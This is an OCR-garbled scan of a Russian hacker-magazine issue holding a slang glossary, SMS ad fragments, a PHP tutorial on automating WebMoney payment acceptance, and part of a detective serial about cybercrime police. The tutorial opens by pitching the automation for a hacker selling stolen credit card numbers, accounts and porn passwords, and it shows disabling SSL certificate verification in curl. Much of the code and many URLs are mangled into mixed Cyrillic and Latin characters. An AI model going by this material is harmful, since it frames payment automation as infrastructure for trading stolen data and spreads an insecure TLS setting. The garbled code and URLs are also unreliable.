пиктограмма 
архиватор 
экспозиция 
стробоскоп 
бинарник 
баг 
шлюз 
шелл 
блог 
бэкап 

декодирование 
локалка 
бэкдор 
хомпага 
сессия 
авторизация 
топик 
профиль 
сегмент 
листинг 
алиас 
свитч 
спуфинг 
фрикинг 
крэкинг 
сиквел 
ретранслятор 
коммутатор 
аттач 
плагин 
регистр 
протокол 



(код ѵѵ0077) 
(код ѵѵ0078) 
(код ѵѵ0079) 
(код ѵѵ0080) 
(код ѵѵ0081) 
(код ѵѵ0088) 
(код ѵѵ0089) 
(код ѵѵ0092) 
(код ѵѵ0093) 
(код ѵѵ0094) 
(код ѵѵ0095) 
(код ѵѵ0096) 
(код ѵѵ0097) 
(код ѵѵ0098) 
(код ѵѵ0099) 
(код ѵѵОІОО) 
(код ѵѵОІОІ) 
(код ѵѵ0102) 
(код ѵѵОІОЗ) 
(код ѵѵ0104) 
(код ѵѵ0105) 
(код ѵѵОІОб) 
(код ѵѵ0107) 
(код ѵѵ0108) 
(код ѵѵ0109) 
(код ѵѵОІІО) 
(код ѵѵОШ) 
(код ѵѵОІІЗ) 
(код ѵѵ0114) 
(код ѵѵ0115) 
(код ѵѵОІІб) 
(код ѵѵ0117) 
(код ѵѵ0118) 
(код ѵѵ0119) 
(код ѵѵ0120) 
(код ѵѵ0121) 
(код ѵѵ0128) 

| (код ѵѵ0129) 
(код ѵѵОІЗО) 
(код ѵѵОІЗІ) 
(код ѵѵ0132) 
(код ѵѵОІЗЗ) 
(код ѵѵ0134) 
(код ѵѵ0135) 
(код ѵѵОІЗб) 
(код ѵѵ0137) 
(код ѵѵ0138) 
(код ѵѵ0139) 
(код ѵѵ0140) 

| (код ѵѵ0141) 
(код ѵѵ0142) 
(код ѵѵ0143) 
(код ѵѵ0144) 
(код ѵѵ0145) 
(код ѵѵ0146) 
(код ѵѵ0147) 
(код ѵѵ0148) 
(код ѵѵ0149) 
(код ѵѵ0150) 
(код ѵѵОІБІ) 
(код ѵѵ0152) 
(код ѵѵ0153) 
(код ѵѵ0154) 
(код ѵѵ0155) 
(код ѵѵ0156) 
(код ѵѵ0076) 



Пришли свои термины на номер 4445 в виде 98 
Іегтіпі (например "98 баг"). Не более 160 
символов латиницей или 70 кириллицей. 



чи услугу УѴАР/СРРЗ-доступа в Интернет (оплачивается 
(/4446.Ш. В случае ошибки уточни настройки в службе 
45 - $0,60 без учета налогов, на номер 4446 - $0,90 без 
іроса услуга считается оказанной. 
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Организовываем 
автоматический прием 
интерн ет- п л атеже й 



Чтобы установить сіІРІ, 
нужно слить дистрибутив с 
М1р://сигІ.Ьахх.5е, сделать 
/сопіідиге, таке, таке 
іпзіаІІ, собрать РНР с опцией 
-\л/ИЬ-сигІ[=ОІР], где РІР - 
имя директории, содержа- 
щей поддиректории ІіЬ и 
іпсіибе. Директория іпсіибе 
должна содержать подди- 
ректорию сиг! с файлами 
еазу.Ь и сигі.іі. Директория 
ІіЬ должна содержать файл 
ІіЬсигІ.а. После этого уже 
можно использовать в сво- 
их сценариях функции сіІРІ 



=г 

о 



[мечты, мечты] По поводу самостоятельного механизма по зараба- 
тыванию денег — это я не зря сказал. Вполне реально, смотри сам. Ска- 
жем, некий хакер торгует номерами кредиток, рр-аккаунтами, пассами 
для порнухи, соксами, или еще чем-то по своей природе виртуальным. 
Соответственно, если он организует автоматический прием денег и всю 
работу с клиентами возложит на несложные скрипты, то получит суве- 
ренный торговый механизм, который будет работать без его непосред- 
ственного участия. Ну, разве что нужно будет обновлять файл с креда- 
ми и обналичивать деньги :). Однако, чтобы реализовать это, необходи- 
мо как следует разобраться с тем, каким же образом можно автомати- 
чески, без использования собственных рук, монитора и глаз, принимать 
пользовательские платежи. 
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Механика 

ѵѵт-процессинга 

ТЫ, КОНЕЧНО ЖЕ, НАСЛЫШАН ОБО ВСЕХ 
ПРЕЛЕСТЯХ ИНТЕРНЕТ-ТОРГОВЛИ. НЕ НУЖНО 
АРЕНДОВАТЬ ТОРГОВЫЕ ПЛОЩАДИ, НЕ 
НУЖНО ПЛАТИТЬ ЗАРПЛАТУ КАССИРАМ И 
МНОГОЧИСЛЕННЫМ МЕНЕДЖЕРАМ. ДАЖЕ 
ДЕНЬГИ МОЖНО ПОЛУЧАТЬ ПО ИНТЕРНЕТУ — 
ЧЕРЕЗ ѴѴЕВМОЫЕѴ, ЯНДЕКС.ДЕНЬГИ ИЛИ Е- 
ООШ. ВДОХНОВЛЕННЫЕ ЭТОЙ ИДЕЕЙ, ЛЮДИ 
НАОТКРЫВАЛИ ЛЕВЫЕ МАГАЗИНЫ, 
ПРЕДЛАГАЮЩИЕ ОПЛАТИТЬ УСЛУГИ 
ЭЛЕКТРОННЫМ СПОСОБОМ. ОДНАКО У ТЕБЯ 
БУДЕТ ПЕРЕД НИМИ ПРЕИМУЩЕСТВО: ПРИЕМ 
ПЛАТЕЖЕЙ ТЫ БУДЕШЬ ОСУЩЕСТВЛЯТЬ 
АВТОМАТИЧЕСКИ, И ПРЕВРАТИШЬ СВОЮ 
ЛАВОЧКУ В САМОСТОЯТЕЛЬНЫЙ МЕХАНИЗМ 
ПО ВЫРАБАТЫВАНИЮ ДЕНЕГ :). ЧТО, 
ИНТЕРЕСНО? I пікііогг (пікіІ02@геаІ.хакер.ги) 



[процессинг как он есть] Разумеется, в теории можно написать 
программу, которая для осуществления автоматических транзакций бу- 
дет использовать тот же самый интерфейс, предназначенный для жи- 
вых людей. В самом деле, во взломе мы уже писали о том, как можно 
создать программу, которая будет управлять работой ѴѴМ-Кеерег'а. Ну 
и, конечно, можно без больших проблем научиться использовать для 
осуществления транзакций человеко-адаптированный ѵѵеЬ-интерфейс. 
Но это довольно дурацкое решение, некрасивое и неэффективное. Осо- 
бенно учитывая тот факт, что сами разработчики платежных систем соз- 
дают удобные программные интерфейсы для осуществления транзак- 
ций. Сейчас я расскажу тебе, как функционируют эти гейты, как рабо- 
тать с ними и каким образом на практике можно написать программу, 
реализующую прием электронных денег. Чтобы не быть голословным и 
не отрываться далеко от практики, мы напишем вместе несколько нес- 
ложных скриптов, реализующих часто встречающиеся задачи. Я все бу- 
ду делать на примере ѴѴеЬМопеу, поскольку это самая популярная сис- 
тема в России, и с ней удобнее всего работать. 

[начнем] Довольно вводных слов, давай перейдем к делу. Под «интер- 
фейсами» для осуществления транзакций специалисты ѴѴеЬМопеу по- 
нимают набор азр-скриптов, размещенных на сервере Мірз:/МЗз.ѵѵеЬ- 
топеу.ш. Каждый скрипт отвечает за определенное действие, однако 
работа с ними выглядит весьма однотипно и однообразно. 

Существует два типа интерфейсов: ЬДрз, и хті. В первом случае вся уп- 
равляющая информация (данные о плательщике, магазине, цифровая 
подпись запроса и т.д.) передается по НТТРЗ-протоколу методом (ЗЕТ. 
Во втором эти данные приводятся к виду ХМЬдокумента, кодируются 
МІМЕ и посылаются в виде РОЗТ-запроса с использованием ЗЗЬшиф- 
рования. Мне больше нравится идея использовать ХМЬ-представление 
запросов и ответов, но это из-за паталогической любви к этой техноло- 
гии. Разработчикам ѴѴМ, видимо, по душе (ЗЕТ-метод, и они в приложе- 
нии к технической документации написали набор РНР-скриптов для 




шшш.шеЬтопеу.ги/рМеѵеІорегз.зІіітІ. 



электронного процессинга. Каждый такой пример использует (ЗЕТ -зап- 
рос для передачи данных, и представляется мне удачным учебным при- 
мером. Мы с тобой разберемся с работой этих скриптов и напишем 
собственное приложение, использующее ХМІ_ для передачи запросов. 

[сага о подписях] Среди отправляемых автоматическому интерфей- 
су параметров, я упомянул какую-то цифровую подпись запроса. Впол- 
не резонный вопрос: что это такое? Грубо говоря, это уникальная для 
каждого запроса строка длиной в 133 символа. Она генерируется спе- 
циальной программой ѴѴМЗідпег, которая поставляется исходными ко- 
дами. Собрать ее можно, насколько я понял, под любой платформой 
и, разумеется, под ѴѴіпсІоѵѵз предлагается скачать уже собранный би- 
нарник (сНІ для N3). Поскольку я использовал для своих опытов РгееВЗО, 
я скачал с Шр://6о^пІоа6.^еЬтопеу.ги/У\ІМЗідпег.т.ір сорцы программы 
и довольно быстро привел ее к исполняемому виду: 

$ ѵѵдеі ИНрѴ/сІоѵѵпІоасІ.ѵѵеЬтопеу.ги/ѴѴМЗідпег.гір 
$ ипіір ѴѴМЗідпег.іір 

# даем установочному скрипту права для выполнения 
$ сИтосІ +Х сотрі.зіі 

$ ./сотрі.зіі # собираем бинарник, скрипт сам сделает все, что нужно 



Как заверяют разработчики, на большинстве систем программа соберет- 
ся без лишних вопросов. У меня и в самом деле это заняло полсекунды, 
и не было никаких ошибок, думаю, что и у тебя все получится, как надо. 

После того, как установочный сценарий завершит свою работу, и в те- 
кущей папке появится бинарник ѴѴМЗіпдег, нужно создать файл с наст- 
ройками ѴѴМЗіпдег.іпі и записать туда три строки: 

489406628422 # мп-Ш 
ЕоиубдЭа # пароль 

/раШЛо/кеу.кѵѵт # путь к файлу с ключами 

Теперь настало время протестировать работу ѴѴМЗідпег'а: 

$ есііо -пе "хакер\004\г\п" I ./ѴѴМЗідпег 

Зс41 1Т96426ссІ80027ес5с87Т8е1 е004ееаеІ8487Ь80092сЬ696Ь2сі80М Ь 
асІ8Т2ЬЬ04336Ь598а56ТеТ62а71 9е7а596е8255е7а2аЬ662а1 ас9б59с2еЬ 
ОеОІ 13830074 

Если программа тебе вывела похожую строчку, значит, все работает как 
нужно, и можно переходить к следующему этапу нашей работы — не- 
посредственно к использованию автоматических интерфейсов. 

[юзаем интерфейсы] Первым делом давай разберемся О 
с работой одного простого примера, который нам заботли- ^ 
во приготовили разработчики компании ѴѴеЬМопеу. Для 
этого возьми с нашего диска архив ѵѵтех_рЬр, залей его на і 
хост, помести внутрь папки файл ѴѴМЗідпег с настройками, о 
отредактируй файл настроек ѵѵтсопзЬіпс. Все это делается * 
по наитию и секунд за 25. 

После этого ты уже сможешь легко работать с тестовыми 
примерами. Давай попробуем с тобой воспользоваться ин- 
терфейсом «Выписывание счета от одного участника друго- 
му». Для этого достаточно заполнить все поля и клацнуть на 
кнопку отправки запроса. Если все работает верно и ты все 
нормально настроил, тебе покажут номер счета и сообщат, 
что он выписан нормально. Хотя я на 100% уверен, что у те- 
бя сразу возникнет сообщение «Ошибка связи с сертифи- 
кационным центром ѴѴеЬМопеу». Первая причина, по кото- 
рой это может произойти, заключается в том, что у тебя мо- л 

жет быть не установлен пакет сІІВІ_, который нужен нам о 

для работы. Если он не стоит, его необходимо инсталлиро- ^ 
вать в системе — о том, как это сделать, написано в соот- о 
ветствующей врезке. А вторая причина, по которой у тебя о. 
точно возникнет эта ошибка, заключается в том, что в ЗЗІ_ * 
не установлен сертификат для связи с ѵѵт-сервером. Сле- ^ 




все интерфейсы ѴѴМ отлично документированы, но не все они открыты 
для свободного доступа 
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вот так выглядят сорцы ѴѴМЗіпдег | 



дует скачать этот сертификат с ил/іл/ілі /ѵеЬтопеу.ги, разместить его на 
твоем сервере в доступном сценариям месте и внутри файла ѵѵт.іпс 
найти функцию _НирВец: 

[код функции, реализующий НТТРЗ-запрос] 

Іипсііоп _НирзВец($асІсІг) 

{ 

$сИ = сигІ_іпіІ( ,, [іирз:/МЗз.\А/еЬтопеу.ги ,, .$асісіг); 
сигІ_зеІорІ($сіі, (Ж1_0РТ_НЕА0ЕВ, 0); 
сигІ_зеІорІ($сіі, СиВ10РТ_ВЕТиВЫТВАМЗРЕР,1 ); 
сигІ_зе{орІ($сІі, СиВІ_0РТ_35І__ѴЕВІРѴРЕЕВ, РАЬЗЕ); 
сигІ_5еіорі($сН, СиВЮРТ_СА1МР0, 

"/Ііоте/арасИе/ігесІ/ІіісІосз/рау/ѵѵт.сіІ"); # здесь надо указать путь 

к сертификату, или можно установить его в ЗЗІ_ 

$гезиІІ=сигІ_ехес($сІі); 

сигІ_сІозе($сИ); 

геіигп $гезиІІ; 

} 

Если возиться с сертификатами не хочется, а хочется побыстрее попро- 
бовать систему в действии, нужно заменить строку сигІ_зе1ор1($сГі, СІІВ- 
1_ОРТ_САІЫРО...) на сигІ_зе1ор1($сН, СІІПІ_ОРТ_ЗЗІ__ѴЕВІРѴРЕЕВ, 
РАІ_ЗЕ). Хоть делать так разработчики не советуют, нашим опытам это 
не помешает ни капельки. Другое дело, что так нельзя делать с боль- 
шим магазином, где крутятся деньги. 

После того, как ты исправишь функцию _НирзВец, или установишь сер- 
тификат, все должно заработать. Теперь давай разберемся с тем, как 
функционирует эта программа. В файле ѵѵт.іпс найди функцию 
ІпѵСгеаІе: 

[код фукнции, реализующей выписку счета через [Шрз-интерфейс] 

Іипсііоп ІпѵСгеаІе($ѵѵтіс1, $зитт, $іпѵ_Ш, $сІзс, $ас!г) 

{ 

# поскипано, тут объявляются переменные 
$РІапЗІг = 

"$ОгсіегЮ$ІодіпОІСизІ$РигзеОІЗІогез$Атоит$Оезс$ІпѵАсісігез5$Регіо 
б$ЕхрегаІіоп$ВедиезШ";# прописываемая строка запроса 
$3ідп31г = _6еІЗідп($РІапЗІг); # формируется подпись запроса 
$ШзІІгІ=7азр/Іпѵоісе.азр?31=$ІодіпОІЗШгез&ЗР=$Риг5еОІЗІогез&С 
1=$ІодіпОТСиз1:&ІЫ=$ОгсІегЮ&0=".игІепсосІе($Ое5с)."&АО=".игІеп- 
сосіе($ІпѵАсісіге55)."&А=$АтоипІ&Е=$ЕхрегаІіоп&Р=$Регіосі&ВМ=$Вед 
иезШ&33=$ЗідпЗІг";# соствляется ІІВЬ деі-запроса 
$ІШрзВез = _НИрзВед($Шз11г1); # выполняется запрос 
і! (зиЬзІгфІтйрзРІезДб) == "Еггог:") # разбирается ответ, если произошла ошибка 
{ 

$еггСобе = зргіпй("%с1", 5иЬ5Іг($ІШрзВе5,6)); # получается код ошибки 

# поскипано. Тут в зависимости от кода ошибки выводятся разные 

# сообщения 

\\ (5иЬ5Іг($ІШрзВе5,0,8) == "ѴѴМІпѵІсІ:") #Если все выполнилось нормально 
{ 

$\л/тіпѵ_ісІ = зргіпй("%с]", 5иЬ5Іг($ІШрзВе5,8)); # получаем номер счета 
} геіигп аггау($\д/тіпѵ_іб, $егг); 

} 



Как видишь, все просто. Фактически, работа функции сводится к фор- 
мированию ІІВІ_, к которому следует обратиться, чтобы выполнить тран- 
закцию. В самом деле: из параметров запроса, согласно документации, 
формируется подписываемая строка, затем, при помощи функции 
_ѲеіЗідп, формируется ЦП, которая помещается в качестве параметра 
запроса с именем 33. После того, как в соотвествующие ѲЕТ-поля, сог- 
ласно документации, установлены значения параметров запроса, при 
помощи функции _НирВец он отправляется серверу, и происходит не- 
хитрая обработка ответа. Что касается функции _ѲеіЗідп, то идеологи- 
чески работает она просто: при помощи знакомой тебе функции рореп 
открывается пайп с процессом ѴѴМЗідпег, туда вдувается подписывае- 
мая строка и извлекается ЦП запроса. Что касается _НирВец, то этот 
блок кода приведен чуть выше. Легко увидеть, что он использует в сво- 
ей работе функции сигі, краткое описание которых ты найдешь в соот- 
ветствующей документации на нашем диске. 

[другие интерфейсы] Как я уже говорил, в системе ѴѴМ доступно 
большое количество интерфейсов: для перевода средств, отправки со- 
общений по внутренней почте и т.д. К сожалению, в свободном досту- 
пе находится лишь небольшая их часть, для доступа к остальным нуж- 
на регистрация. Но нам это не помешает. Как видишь, мы уже с тобой 
разобрались с работой НИрз-интерфейса, выписывающего покупате- 
лю счет. На нашем диске ты найдешь мой скрипт, реализующий тоже 
самое, но через более современный ХМЬинтерфейс. Приводить здесь 
его код и описывать работу я не буду, незачем повторяться, лучше мы 
напишем приложение, которое будет проверять, оплачен ли выписан- 
ный ранее счет, или нет. Дело в том, что интерфейс, позволяющий 
напрямую переводить деньги, закрыт от свободного доступа, и, чтобы 
придать законченность изложению, мы будем использовать такую схе- 
му: покупателю выписывается счет за товар, он его оплачивает, сце- 
нарий проверяет это, и, если счет оплачен, регистрирует этот факт. Ес- 
ли получить доступ к интерфейсу прямого перевода денег, эта схема 
упрощается. Но настоящая правда в том, что работают все эти гейты 
абсолютно одинаково и нам сейчас с тобой главное научиться как сле- 
дует их использовать. А переделать приложение под конкретный ин- 
терфейс — дело 30 секунд. Ты главное разберись как следует с этим. 

[варим хті] Проверка перевода средств между кошельками осущес- 
твляется через гейт М1рз://ѵѵ3з . ѵѵеЬтопеу. ги/азр/ХМІ. Орегаііопз.азр . Для 
реализации запроса необходимо составить РОЗТ-запрос для этого сце- 
нария в следующем формате: 

[формат запроса на получение информации об оплате счета] 
сѵѵЗз.гедиезЬ 

<гедп>$гедп</гедп> # номер запроса должен быть больше предыду- 
щего идентификатора 

<\л/тіс]>$\л/тіс]</\л/тіс]> # ѴѴМШ подписавшего запрос 
<зідп>$зідп</зідп> # ЦП запроса 
<деІоиІіпѵоісез> # Информация об интересующих счетах 
<ригзе>$5Іогеригсе</ригзе>#кошелек, для оплаты на который выпи 
сывались счета 

<ѵ\/тіпѵісІ>$іпѵс_п</\л/тіпѵісІ># необязательно: номер счета 
<огбегісЬ</огсІегіс]># необязательно:номер заказа внутри магазина 
<баІезІагЬ$баІезІагк/с]аІе5ІагЬ# обязательно: начало временного 





промежутка создания счета 

<сІаі:еТіпізИ>$сІа1:е1 : іпізИ</сІа1:еТіпі5Іп># обязательно: окончание вре 
менного промежутка создания счета 
</деІоиІіпѵоісез> 
с/ѵѵЗз.гедиезЬ 

Цифровая подпись для этого запроса изготавливается из строки $зІоге- 
ригсе.$гецп, но есть из склеенного номера кошелька и номера запроса. 
После того, как мы составили данные РОЗТ-запроса, необходимо соз- 
дать сам заголовок, который будет отправлен ѵѵеЬ-серверу. Это обыкно- 
венная строка, которая начинается так: 

$беасІег = "РОЗТ ".$раде." НТТР/1 .0 \г\п"; 

$беабег .= "МІМЕ-Ѵегзіоп: 1 .0 \г\п"; 

Она представляет собой набор заполненных, согласно ВЕС, стандарт- 
ных полей. Я не буду об этом подробно рассказывать — на нашем дис- 
ке в моем примере ты увидишь, как это делается. Или можешь легко 
найти в инете любой пример. После того, как заголовок создан, необхо- 
димо при помощи функций сІІВІ_ отправить его серверу: 

$сіі = сигІ_іпіІ($іігІ); 

сигІ_зеіор(($сІі, СиВШРТ_ЗЗЦ/ЕР11РУРЕЕВ, ЕАІ.ЗЕ); 
сигІ_зеіор(($сІі, СиВШРТ.ВЕТІШТВАМЗЕЕВ, 1); 
сигІ_зеІорІ($сІі, СиВШРТ_Си5Т0МВЕ0иЕ5Т, $ІіеасІег); 

$(Ма = сигІ_ехес($сІі); 

После этого в $ба1а будет помещен результат выполнения запроса — 
документ следующего вида: 

[формат ответа сервера] 

<\А/35.гезропзе> 

<гедпх/гедп> 

<геІѵаІж/геІѵаІ> 

«сгеМезсж/геМезо 
соиііпѵоісез спІ="п" > 
соиііпѵоіее Іс1="п1" Із="п2"> 

# здесь куча полей с инфой о счетах. Нас интересует только 

# зіаіе — состояние счета 
</оіЛіпѵоісе> 

<оиІіпѵоісе>...</ои!іпѵоісе> 

</оиІіпѵоісез> 

</\л/35.гезропзе> 

Соответственно, для обработки этого ХМЬдокумента нужно использо- 
вать встроенный в РНР парсер: 

$рагзег=хтІ_рагзег_сгеаІе(); 

хтІ_рагзег_5еІ_орІіоп($рагзег,ХМІ_ОРТІОН_САЗЕ_РОЮІН6,0); 
хтІ_зеІ_еІетепІ_ііапсіІег($раг5ег, "зІаПЕІетепГ, "епбЕІетепІ"); 
хтІ_зеІ_сІіагасІег_сіаІа_[іапсіІег($раг5ег, "сІіагасІегОаІа"); 
хтІ_рагзе($рагзег,$сіаІа); 

Как видно из этого кода, я объявил следующие функции для обработки 
открывающего и закрывающего тегов элементов: зІагІЕІетепІ и 
епсІЕІетепк Анализ символьных данных будет реализовываться при по- 
мощи функции сГіагасІегОаІа. Чтобы не быть голословным и чтобы тебе 
все было предельно понятно, приведу здесь код этих функций: 



[функции-обработчики ХМІ_'ного ответа сервера] 

# во всех процедурах $1о,$сштепГГад и $гез — глобальные переменные 
Іипсііоп зІагІЕІетепІ($рагзег, $пате, $аН) 

{ 

$сиггепГГад=$пате; 

і!($пате=="оиІіпѵоісе" && $аи["іс]"]==$_Р03Т[\л/т_іпѵс_п]) $То=1 ; 

} 

Іипсііоп епсІЕІетепІ($раг5ег, $пате) { 
і!($пате==="оіЛіпѵоісе" && $То===1 ) $То=0; 

} 

Іипсііоп сбагасІег0аІа($рагзег,$сІаІа) { 

ІІ($Іо===1){ 

іІ($сиггепІТад=="атоипГ) $гез=$(Ма; 

}} 

После парсинга данных в глобальной переменной $гез окажется код ре- 
зультата запроса: 

- 0 — счет не оплачен 

- 1 — счет оплачен по протекции 
-2 — счет оплачен окончательно 

- 3 — в оплате счета отказано 

[чему мы научились] Мы с тобой научились, в общем-то, всей нес- 
ложной науке проведения автоматических транзакций в системе ѴѴМ. По 
идее, теперь для тебя не должно быть проблемой написать скрипт, кото- 
рый будет отправлять сообщение по внутренней почте, или осущес- 
твлять прямой перевод денег. Все это реализуется абсолютно анало- 
гично по разобранным мной примерам — ты умеешь использовать как 
ГіЛрз, так и хті-интерфейсы системы и реализовать любую задачу для 
тебя будет несложно, пусть и подглядывая в эту статью. Если у тебя 
остались какие-то вопросы, советую обратиться к документации на на- 
шем диске, или напрямую на сайт ѴѴМ: уѵуѵуѵ. ѵѵеЬтопеу. ги/рісіеѵеіорегз . зМтІ. 
Удачи. Если у тебя есть вопросы, которые ты никак не можешь решить, 
то, так уж и быть, пиши мне на пікіІ 02 @геаІ.хакер.ги. Только не забудь 
перед этим положить на 2557712535333 долларов 50, ок? :) © 
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Загадки Нострадамуса 

КИРЯКИН С КРИКОМ ВСКОЧИЛ С ПОСТЕЛИ. 
ЛЕЖАЩАЯ РЯДОМ ЛАРИСА С ТРЕВОГОЙ 
СМОТРЕЛА НЕ НЕГО И ПОПЫТАЛАСЬ УСПОКОИТЬ.. 

тіпсІ\л/Огк (тіпб\л/Огк@дате!апсІ.ги) 



Часть третья 

— Это был всего лишь кошмар. Видишь, ты дома. Все в порядке. 

Вид собственной спальни и жены привел его в чувство, но в мозгу еще 
прокручивался недавний сон. Зловещая фигура в капюшоне, утаскива- 
ющая дочь, его безуспешные попытки догнать их, фраза: «Ты не выпол- 
нил задачу! Теперь твоя дочь моя» и зловещий смех. 

На часах было начало пятого. Кирякин рухнул на подушку и попытался 
снова заснуть, но так и пролежал до 6 утра, смотря в потолок. 

Перед выходом на работу, он позвонил хакеру Крису — одному из инфор- 
маторов отдела «К», с охотой выдающего своих приятелей в обмен на от- 
мазу своих старых грешков. В отделе его терпеть не могли за подхалим- 
ство и отъявленное стукачество, и дали прозвище "Крыс", но он, как любой 
стукач, был полезен отделу. Понадобилось 4 минуты, чтобы Крыс снял 
трубку. 

— Какого черта? — послышался сонный голос. 

— Чертей ты в тюрьме увидишь, если так с майором милиции будешь 
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разговаривать. 

— Эээ... Вадим Сергеевич? Здравствуйте. Рад вас слышать. 

— В 10 утра придешь в мой кабинет. И не заставляй меня ждать. 

— Сегодня? 

— Нет, через год, — издевающимся тоном ответил Кирякин и положил трубку. 

25-летний Крыс во многом действительно был похож на крысу — худой, 
с длинным острым носом, в очках с круглыми линзами и пучком редею- 
щих каштановых волос. Голос у него был мягкий, елейный, старающий- 
ся всем угодить. Все это, вместе с несуразной одеждой, состоящей из 
мятой клетчатой рубашки, штанов в крупную полоску и сандалий, про- 
изводило отталкивающее впечатление. 

— Вызывали, Вадим Сергеевич? — промяукал Крыс. 

— Садись! — приказал следователь и кивнул на стул. 

Кирякину не доставляло удовольствие общаться с этим типом, но у не- 
го могла быть нужная информация. Крыс долгое время крутился в 
компьютерном андеграунде, знал многих «отцов» хака и даже состоял в 
двух крупных хакерских группировках. Пока товарищи по ремеслу не уз- 
нали, что он стукачит в органы. Ходили слухи, что Крыса подловили во 
дворе его дома и сильно избили его же старые дружки. Но правда это, 
или нет, следователь не знал. 

— В общем, слушай, Евдокеев, нам вчера заявку оставили — кто-то 
взломал крупный сетевой аукцион и похитил номера кредиток пользова- 
телей. Попахивает 20 годами тюрьмы, не находишь? 

Хакер Крис покраснел: 

— Ну а я то причем, товарищ следователь? 

— Так ведь за тобой такой грешок уже был, помнишь? 13 февраля 2003 
года. Е-Іогд.ш. 

— Товарищ следователь, так ведь это давно было. Я уже давно раска- 
ялся, отработал, вроде. 

— А кто тебя знает, раскаялся ты или нет? Симптомы те же. Использо- 
вание аналогичной уязвимости, та же цепочка прокси. Опять взялся за 
старое, негодяй? — голос Кирякина принял угрожающие ноты. 

— Да я уже 2 года ничего не ломал. Богом клянусь! 

— На что мне твои клятвы? Алиби есть у тебя? 

— Какое алиби? 

— Ты, Евдокеев, дурака из меня не строй! — рассердился следователь. 
Крыс еще сильнее покраснел и притих. 

— В общем, ладно, разберемся. Если действительно не ломал, ничего 
тебе не станется. А если решил опять в свои игры играть — получишь 
20 лет минимум, — сделал ударение на последнем слове Кирякин, — и 
я лично прослежу, чтобы тебя в самую бандитскую тюрягу засадили. 

На Крыса было жалко смотреть. 

— Теперь вот что, — продолжил следователь, — мы сейчас ищем одно- 
го деятеля, который испытывает сильную тягу к телевидению. А конк- 
ретно — к каналу В-ТѴ. У тебя есть такой среди знакомых? 

Хакер наморщил лоб, пытаясь вспомнить. 

— Да нет, вроде. 

— Ты тщательнее подумай. Может, кто-то рассказывал об интересной 
передаче по В-ТѴ? Или хвастался взломом их компьютерной сети? Пом- 
ни, помогая мне, ты помогаешь лично себе. 

Крыс снова задумался, но в итоге пожал плечами. 

— Не было ничего такого. 

Следователь вздохнул. 

— Ладно. Свободен. Пока мы ведем расследование по делу аукциона, 
из города не выезжай. 

— Да-да, конечно, — убедительно закивал хакер. И уже, выходя за 
дверь, буркнул: «Кто вообще сейчас смотрит телик?». 

— Что ты сказал? — переспросил Кирякин. 

— Я говорю, никто из хакеров не смотрит телевизор. Нафига он нужен, 
когда есть интернет? 

— А в интернете транслируют такие каналы, как В-ТѴ? 

^ — Конечно. Есть специальный гейт, через который можно в реальном 

СО времени смотреть любую передачу. Стоит это 25$ в месяц, но уже дав- 
но написали скрипт для бесплатного просмотра. 

— Так, погоди. Садись обратно и расскажи мне про этот гейт. 

Внутренняя отделка здания была не менее шикарной, чем само 
здание. Перед тем, как прийти сюда, Кирякин навел справки о 
компании ОгеатТѴ. Генеральный директор Катаров Сергей Ми- 
о хайлович 5 лет назад владел небольшим магазинчиком, торгую- 
5 щим компьютерной техникой. В какой-то момент он продал весь 
® свой бизнес, а вырученные деньги вложил в компанию, специали- 
ст зирующуюся на трансляции популярных ТВ каналов в Сети. Услу- 
* га оказалась востребованной — многие компьютерщики предпо- 
21, читали смотреть нужные передачи прямо на мониторе, без уста- 



новки спутниковой антенны и прочих трудностей. За три года 
ОгеатТѴ превратилась из небольшой конторы в крупную компа- 
нию, ворочающую миллионами. 

— Чем могу вам помочь? — поинтересовалась администратор у заблу- 
дившегося в коридоре Кирякина. 

— Мне назначена встреча с Кагаровым Сергеем Михайловичем. Вы не 
подскажите, где его кабинет? 

— Вам прямо по этому коридору и налево. Большая кожаная дверь. 
Пропустить такую дверь было трудно. Кирякин, постучавшись, отворил 
ее и попал в уютно обставленную прихожую. Рядом с еще одной дверью, 
судя по всему, ведущей в кабинет директора, сидела молоденькая сек- 
ретарша. 

— Мне к Кагарову, — сообщил следователь. 

— Вам назначена встреча? 

-Да. 

— Секундочку. 

Девушка по телефону сообщила шефу о госте и пригласила войти. 
Кабинет был отделан по-домашнему, — большую часть помещения за- 
нимали книжный шкаф и длинный стол, а пол застелен дорогим ковром 
в тигровых тонах. Человек, сидящий за столом, встал и приветственно 
протянул Кирякину руку. 

— Присаживайтесь. Чай? Кофе? 

— Спасибо, от кофе не откажусь. 

Пока Кагаров давал распоряжения секретарше, Кирякин с интересом 
осматривал компьютерную технику на столе. Большой ЖК-монитор, то- 
ненький ноутбук, стоивший явно не меньше двух тысяч, навороченный 
телефон... следователь со вздохом подумал о своем стареньком пенти- 
уме, который уже давно пора было бы сменить на что-то помощнее, ес- 
ли бы только отделу выделили деньги. 

Директору ОгеатТѴ было за 40 — красивый мужчина в стильных оч- 
ках... если бы не бизнес, из него получилась бы хорошая модель для 
рекламы мужского дезодоранта или бритвы. Секретарша принесла ко- 
фе с печеньем в вазочке. Когда она снова вышла, Кагаров обратился к 
гостю: 

— Итак, вы по телефону сказали, что хакерам удалось взломать нашу 
защиту? 

— Да, причем уже давно. Взломщики не распространяли информацию в 
Сети, но бесплатно вашими услугами пользуются, как минимум, чело- 
век 300. 

— По правде, я слышу об этом впервые, но мы очень заинтересованы в 
решении такого рода проблем. 

— Не сомневаюсь. У меня есть подробное описание работы скрипта, ко- 
торый используют хакеры, и я могу помочь вам устранить уязвимость. 
Но мне нужна также ваша помощь. Возможно, один из этих взломщиков 

— человек, которого мы ищем за совершение других преступлений. Нам 
очень важно его найти. 



«Компьютерная лаборатория», как называли ее сотрудники ОгеатТѴ, 
представляла собой просторное помещение, заставленное всевозмож- 
ной компьютерной аппаратурой. Это было сердце компании, так как 
именно через эти серверы пользователи получали телевизионный тра- 
фик. Кирякин насчитал 14 сотрудников, занимающихся компьютерами. 
Главным среди них был Николаевич — седеющий маленький мужичок с 
сердитыми глазами и суетливой походкой. Просмотрев распечатки, при- 
несенные милиционером, он пожал плечами. 

— Ничего удивительного. У нас десятки тысяч клиентов, уследить за по- 
добными инцидентами сложно. 

Кирякин не стал осуждать халатность компьютерщиков ОгеатТѴ. Его 
больше интересовало то, за чем он пришел. 

— Спасибо, конечно, за информацию. Дырку мы прикроем, аккаунты 
тех, кто пользовался скриптом, забаним, — продолжил начальник 
компьютерного отдела. 

— Скажите, вы ведете логи активности ваших клиентов? 

— Да, у нас есть центральный сервер, на котором хранится вся инфор- 
мация, кто и что смотрел, когда и т.д. Все это делается в исследова- 
тельских целях. Нам важно знать, какие передачи и каналы предпочита- 
